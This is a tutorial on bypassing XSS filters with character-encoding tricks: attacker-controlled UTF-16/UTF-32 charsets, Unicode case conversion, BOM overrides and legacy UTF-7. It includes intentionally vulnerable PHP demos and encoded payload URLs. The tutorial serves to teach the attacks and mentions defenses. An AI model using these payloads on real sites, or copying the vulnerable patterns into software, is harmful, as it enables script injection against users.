XSS and Character Encodings (UTF-7, UTF-8, UTF-16, UTF-32)

  1. 0x01 What Is Unicode
  2. 0x02 Controlling the Character Set
  3. 0x03 Exploiting Case Conversion
  4. 0x04 BOM (Byte Order Mark)
  5. 0x05 Finally, a Word on UTF-7
  6. 0x06 References

author: Dlive

0x01 What Is Unicode

Unicode is a character encoding standard. It defines several encoding forms, including UTF-8, UTF-16, and UTF-32.

  1. UTF-8:
    Character size: 1 to 4 bytes

    Examples:
    Character “A” => 0x41
    Character “¡” => 0xC2 0xA1
    Character “ಓ” => 0xE0 0xB2 0x93
    Character “𪨶” => 0xF0 0xAA 0xA8 0xB6

  2. UTF-16:
    Character size: 2 bytes for characters in the Basic Multilingual Plane, 4 bytes (a surrogate pair) for all others

    UTF-16 has two byte orders for representing a character.

    • UTF-16BE (Big Endian) [most significant byte first]
      Example: Character “A” => 0x00 0x41

    • UTF-16LE (Little Endian) [least significant byte first]
      Example: Character “A” => 0x41 0x00

  3. UTF-32:

    Character size: 4 bytes

    UTF-32 also has two byte orders for representing a character.

    • UTF-32BE (Big Endian) [most significant byte first]

      Example: Character “A” => 0x00 0x00 0x00 0x41

    • UTF-32LE (Little Endian) [least significant byte first]

      Example: Character “A” => 0x41 0x00 0x00 0x00
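The byte sequences listed above can be reproduced with a short script. The following is a minimal sketch rather than a reference implementation; the helper names encodeCodePoint, toHex and utf8 are hypothetical and exist only for this illustration. UTF-8 is handled by the standard TextEncoder, while the UTF-16 and UTF-32 forms are built by hand to make the byte order visible.

```javascript
// Encode one Unicode code point as UTF-16 or UTF-32 bytes.
// `encoding` is one of "utf-16be", "utf-16le", "utf-32be", "utf-32le".
function encodeCodePoint(codePoint, encoding) {
  const unitSize = encoding.startsWith("utf-16") ? 2 : 4;
  const littleEndian = encoding.endsWith("le");
  let units = [codePoint];
  if (unitSize === 2 && codePoint > 0xffff) {
    // Outside the BMP, UTF-16 needs a surrogate pair (two 16-bit units).
    const v = codePoint - 0x10000;
    units = [0xd800 + (v >> 10), 0xdc00 + (v & 0x3ff)];
  }
  const bytes = [];
  for (const unit of units) {
    const chunk = [];
    // Emit the most significant byte first, then reverse for little endian.
    for (let shift = (unitSize - 1) * 8; shift >= 0; shift -= 8) {
      chunk.push((unit >>> shift) & 0xff);
    }
    if (littleEndian) chunk.reverse();
    bytes.push(...chunk);
  }
  return bytes;
}

// Format a byte array the way the examples above are written.
function toHex(bytes) {
  return bytes
    .map((b) => "0x" + b.toString(16).toUpperCase().padStart(2, "0"))
    .join(" ");
}

// UTF-8 bytes via the built-in TextEncoder.
const utf8 = (s) => Array.from(new TextEncoder().encode(s));

console.log(toHex(utf8("¡")));                         // 0xC2 0xA1
console.log(toHex(encodeCodePoint(0x41, "utf-16be"))); // 0x00 0x41
console.log(toHex(encodeCodePoint(0x41, "utf-16le"))); // 0x41 0x00
console.log(toHex(encodeCodePoint(0x41, "utf-32be"))); // 0x00 0x00 0x00 0x41
console.log(toHex(encodeCodePoint(0x41, "utf-32le"))); // 0x41 0x00 0x00 0x00
```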

0x02 Controlling the Character Set

The demo code is as follows:

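<?php
// Disable the browser's built-in XSS filter for the demo.
header('X-XSS-Protection: 0');
// Vulnerable on purpose: the response charset comes from the query string.
header('Content-Type: text/html; charset='.$_GET['charset']);
// Print this file's own source.
highlight_string(file_get_contents(__FILE__, true));
$x=$_GET['x'];
// Naive filter: strip every "<" that is followed by word characters.
$x=preg_replace('/<\w+/', '', $x);
echo $x;
?>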

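As the code shows, the attacker controls the character encoding of the HTML page.

UTF-16 and UTF-32 can therefore be used to bypass the filter. The regular expression runs on the raw bytes, where every < byte is immediately followed by a 0x00 byte instead of a word character, so /<\w+/ never matches, while the browser decodes the same bytes as markup in the attacker-chosen charset. The payload we use is <svg/onload=alert()>.

Constructing the payloads:

Payload 1 (UTF-16LE):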

http://rakeshmane.com/lab/unicode/xss.php?x=%3C%00s%00v%00g%00/%00o%00n%00l%00o%00a%00d%00%3D%00a%00l%00e%00r%00t%00%28%00%29%00%3E%00&charset=utf-16le

Payload 2 (UTF-16BE):

http://rakeshmane.com/lab/unicode/xss.php?x=%00%3C%00s%00v%00g%00/%00o%00n%00l%00o%00a%00d%00%3D%00a%00l%00e%00r%00t%00%28%00%29%00%3E&charset=utf-16be

Payload 3 (UTF-32LE):

http://rakeshmane.com/lab/unicode/xss.php?x=%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00%3D%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00%28%00%00%00%29%00%00%00%3E%00%00%00&charset=utf-32le

Payload 4 (UTF-32BE):

http://rakeshmane.com/lab/unicode/xss.php?x=%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00%3D%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00%28%00%00%00%29%00%00%00%3E&charset=utf-32be

Note:

When the byte order (BE or LE) is not specified, browsers by default treat UTF-16 as Little Endian and UTF-32 as Big Endian.
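The four payload strings can be generated rather than typed by hand. The sketch below is an illustration under stated assumptions: encodeAscii, percentEncode and filterBytes are hypothetical helper names, and filterBytes only imitates the byte-oriented preg_replace('/<\w+/', '', $x) from the demo by mapping each byte to one character, so it shows why the filter misses the encoded payload but is not the PHP engine itself.

```javascript
// Encode an ASCII string as fixed-width code units (1, 2 or 4 bytes each).
function encodeAscii(text, unitSize, littleEndian) {
  const bytes = [];
  for (const ch of text) {
    const unit = new Array(unitSize).fill(0);
    // The single significant byte goes first (LE) or last (BE).
    unit[littleEndian ? 0 : unitSize - 1] = ch.charCodeAt(0);
    bytes.push(...unit);
  }
  return bytes;
}

// Percent-encode bytes, leaving ASCII letters, digits and "/" untouched,
// which matches the style of the payload URLs in this section.
function percentEncode(bytes) {
  return bytes
    .map((b) => {
      const ch = String.fromCharCode(b);
      return /[A-Za-z0-9\/]/.test(ch)
        ? ch
        : "%" + b.toString(16).toUpperCase().padStart(2, "0");
    })
    .join("");
}

// Imitation of the demo's filter: one character per byte, then strip "<\w+".
function filterBytes(bytes) {
  return String.fromCharCode(...bytes).replace(/<\w+/g, "");
}

const payload = "<svg/onload=alert()>";

console.log(percentEncode(encodeAscii(payload, 2, true)));  // UTF-16LE
console.log(percentEncode(encodeAscii(payload, 2, false))); // UTF-16BE
console.log(percentEncode(encodeAscii(payload, 4, true)));  // UTF-32LE
console.log(percentEncode(encodeAscii(payload, 4, false))); // UTF-32BE

// Plain ASCII loses its tag, the UTF-16LE bytes pass through unchanged.
console.log(filterBytes(encodeAscii(payload, 1, true)));    // /onload=alert()>
console.log(filterBytes(encodeAscii(payload, 2, true)).length); // 40
```

The generated strings go into the x parameter, and the matching encoding name goes into the charset parameter.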

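0x03 Exploiting Case Conversion

The script below finds special Unicode characters with one property in common: converting them to upper case or to lower case yields an ASCII character such as an English letter.

These characters can be used to bypass some filters.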

// Find non-ASCII characters whose upper- or lower-case form is an ASCII character.
const ascii = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\"/?><';:.,|\\+=-_*&^%$#@!~`";
const highNumber = 65000;
for (let i = 0; i < highNumber; i++) {
  const ch = String.fromCharCode(i);
  // Skip characters that are already in the ASCII set above.
  if (ascii.includes(ch)) continue;
  const lower = ascii.includes(ch.toLowerCase()) ? ch.toLowerCase() : "";
  const upper = ascii.includes(ch.toUpperCase()) ? ch.toUpperCase() : "";
  if (lower !== "" || upper !== "") {
    console.log(" " + i + " Original : " + ch + " [\\u" + i.toString(16) + "] LowerCase : " + lower + " UpperCase : " + upper);
  }
}

The demo code is as follows:

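<?php
header('Content-Type: text/html; charset=UTF-8');
header('X-XSS-Protection: 0');

// Print this file's own source.
highlight_string(file_get_contents(__FILE__, true));
$x=$_GET['x'];
// Case-insensitive filter for "<script".
$x=str_ireplace('<script','BLOCKED',$x);
// The conversion runs after the filter, which is what makes the bypass possible.
$x = mb_convert_case($x, MB_CASE_UPPER);
echo $x;
?>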

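mb_convert_case performs case conversion; its second argument determines whether the string is converted to upper case or to lower case.

Payload:

We replace the letter s with ſ (U+017F, Latin small letter long s, %C5%BF in UTF-8), one of the characters the script above finds. str_ireplace does not treat it as s, so <ſcript passes the filter, and mb_convert_case then turns it into <SCRIPT.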

http://rakeshmane.com/lab/unicode/xss2.php?x=<%C5%BFcript/src=./1></script>

An example of bypassing an XSS filter with case conversion (Google CTF 2017, geokitties v2):
https://github.com/glua-team-ctf/googlectf-quals-2017/blob/master/web/geokitties-v2/README.md
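The filter-then-convert order in the demo can be imitated in a few lines. This is a sketch under assumptions: filterThenUppercase is a hypothetical name, the explicit character classes stand in for str_ireplace's ASCII case-insensitive match, and JavaScript's toUpperCase stands in for mb_convert_case, so it illustrates the idea rather than reproducing PHP's exact behavior.

```javascript
// Imitate the demo: block "<script" (ASCII, any case), then upper-case the rest.
function filterThenUppercase(input) {
  const filtered = input.replace(/<[sS][cC][rR][iI][pP][tT]/g, "BLOCKED");
  return filtered.toUpperCase();
}

// U+017F (long s) is not an ASCII "s", yet its upper-case form is "S".
console.log("\u017f".toUpperCase()); // S

// The ordinary tag is caught by the filter.
console.log(filterThenUppercase("<script/src=./1></script>"));
// BLOCKED/SRC=./1></SCRIPT>

// The long-s variant slips past the filter and becomes a real tag afterwards.
console.log(filterThenUppercase("<\u017fcript/src=./1></script>"));
// <SCRIPT/SRC=./1></SCRIPT>
```

Running the case conversion before the filter, instead of after it, would close this particular gap.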

0x04 BOM (Byte Order Mark)

What is a BOM? (Wikipedia)

For the 16- and 32-bit representations, a computer receiving text from arbitrary sources needs to know which byte order the integers are encoded in. Because the BOM itself is encoded in the same scheme as the rest of the document, but has a known value, the consumer of the text can examine these first few bytes to determine the encoding.

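In short, a system can identify the encoding of a text from a fixed byte sequence at its very beginning. That fixed byte sequence is the BOM.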

Note: The page must begin with the BOM.

BOM bytes:

For UTF-16 encoding:

Big Endian: 0xFE 0xFF
Little Endian: 0xFF 0xFE

For UTF-32 encoding:

Big Endian: 0x00 0x00 0xFE 0xFF
Little Endian: 0xFF 0xFE 0x00 0x00

One interesting property of the BOM is that it lets you override the charset of the page. The only requirement is that the page begins with the BOM.

Demo (PHP forces the charset, and a BOM is used to override it):

<?php header('X-XSS-Protection: 0');header('Content-Type: text/html;charset=utf-8'); echo preg_replace('/<\w+/', '', $_GET['q']) ?>

<?php highlight_string(file_get_contents(__FILE__, true));?>

Payload (UTF-16LE BOM):
The payload is again <svg/onload=alert()>, encoded as UTF-16LE and prefixed with the UTF-16LE BOM.

http://rakeshmane.com/lab/unicode/xss5.php?q=%FF%FE%3C%00s%00v%00g%00/%00o%00n%00l%00o%00a%00d%00%3D%00a%00l%00e%00r%00t%00%28%00%29%00%3E%00

The same approach works for the other encodings.
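As a rough illustration of BOM handling, the sketch below checks the first bytes of a response against the BOM table from this section and builds the BOM-prefixed payload. The names BOMS, sniffBom, withUtf16leBom and percentEncode are hypothetical, and the sniffing logic is a simplified model of "look at the leading bytes", not the algorithm any particular browser implements.

```javascript
// BOM signatures from the table in this section. The 4-byte signatures are
// checked first because the UTF-32LE BOM begins with the UTF-16LE BOM.
const BOMS = [
  { encoding: "utf-32be", bytes: [0x00, 0x00, 0xfe, 0xff] },
  { encoding: "utf-32le", bytes: [0xff, 0xfe, 0x00, 0x00] },
  { encoding: "utf-16be", bytes: [0xfe, 0xff] },
  { encoding: "utf-16le", bytes: [0xff, 0xfe] },
];

// Return the encoding whose BOM the byte array starts with, or null.
function sniffBom(bytes) {
  for (const { encoding, bytes: signature } of BOMS) {
    if (signature.every((b, i) => bytes[i] === b)) return encoding;
  }
  return null;
}

// Encode a string as UTF-16LE and put the UTF-16LE BOM in front of it.
function withUtf16leBom(text) {
  const bytes = [0xff, 0xfe];
  for (let i = 0; i < text.length; i++) {
    const unit = text.charCodeAt(i);
    bytes.push(unit & 0xff, unit >> 8); // low byte first
  }
  return bytes;
}

// Percent-encode bytes, leaving ASCII letters, digits and "/" untouched.
function percentEncode(bytes) {
  return bytes
    .map((b) => {
      const ch = String.fromCharCode(b);
      return /[A-Za-z0-9\/]/.test(ch)
        ? ch
        : "%" + b.toString(16).toUpperCase().padStart(2, "0");
    })
    .join("");
}

const bomPayload = withUtf16leBom("<svg/onload=alert()>");
console.log(sniffBom(bomPayload));      // utf-16le
console.log(percentEncode(bomPayload)); // value for the q parameter
```

Swapping the BOM bytes and the byte order in withUtf16leBom gives the UTF-16BE variant.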

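0x05 Finally, a Word on UTF-7

In old versions of IE, a UTF-7 BOM can make IE parse the page as UTF-7, which lets a payload slip past XSS filters and results in XSS.

Modern browsers have essentially dropped support for UTF-7, so this technique has little practical value today.

UTF-7 BOM: +/v8

A common payload: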

%2B%2Fv8%20%2BADw-SCRIPT%2BAD4-alert('XSS')%3B%2BADw-%2FSCRIPT%2BAD4-

The defense is to force the encoding by setting charset=utf-8 in the Content-Type header.
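To see what the UTF-7 payload turns into, it helps to decode it. In UTF-7, a run between + and - is base64 of UTF-16BE code units, so +ADw- is < and +AD4- is >. The decoder below is a minimal sketch covering only what this payload needs; decodeUtf7 and B64 are hypothetical names, and error handling is left out.

```javascript
const B64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";

// Decode a UTF-7 string: text outside "+...-" runs is copied as-is,
// text inside a run is base64 that yields 16-bit UTF-16BE code units.
function decodeUtf7(input) {
  let out = "";
  let i = 0;
  while (i < input.length) {
    if (input[i] !== "+") {
      out += input[i++];
      continue;
    }
    i++; // skip the "+" that opens the run
    if (input[i] === "-") {
      out += "+"; // "+-" is the escape for a literal plus sign
      i++;
      continue;
    }
    let bits = 0;
    let bitCount = 0;
    while (i < input.length && B64.includes(input[i])) {
      bits = (bits << 6) | B64.indexOf(input[i]);
      bitCount += 6;
      i++;
      if (bitCount >= 16) {
        // A full 16-bit code unit is available: emit it, keep the remainder.
        bitCount -= 16;
        out += String.fromCharCode((bits >> bitCount) & 0xffff);
        bits &= (1 << bitCount) - 1;
      }
    }
    if (input[i] === "-") i++; // an explicit "-" closes the run
  }
  return out;
}

const utf7Payload =
  "%2B%2Fv8%20%2BADw-SCRIPT%2BAD4-alert('XSS')%3B%2BADw-%2FSCRIPT%2BAD4-";

console.log(decodeUtf7("+ADw-"));                       // <
console.log(decodeUtf7("+/v8").charCodeAt(0) === 0xfeff); // true
console.log(decodeUtf7(decodeURIComponent(utf7Payload)));
```

The last call prints the BOM character U+FEFF followed by a space and the decoded script element.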

0x06 References

  1. Xssing Web With Unicodes

http://blog.rakeshmane.com/2017/08/xssing-web-part-2.html

  2. UTF-7 XSS Paper

http://obnus.blog.51cto.com/2001354/494659

  3. JSONP Security Attack and Defense Techniques (JSONP安全攻防技术)

http://blog.knownsec.com/2015/03/jsonp_security_technic/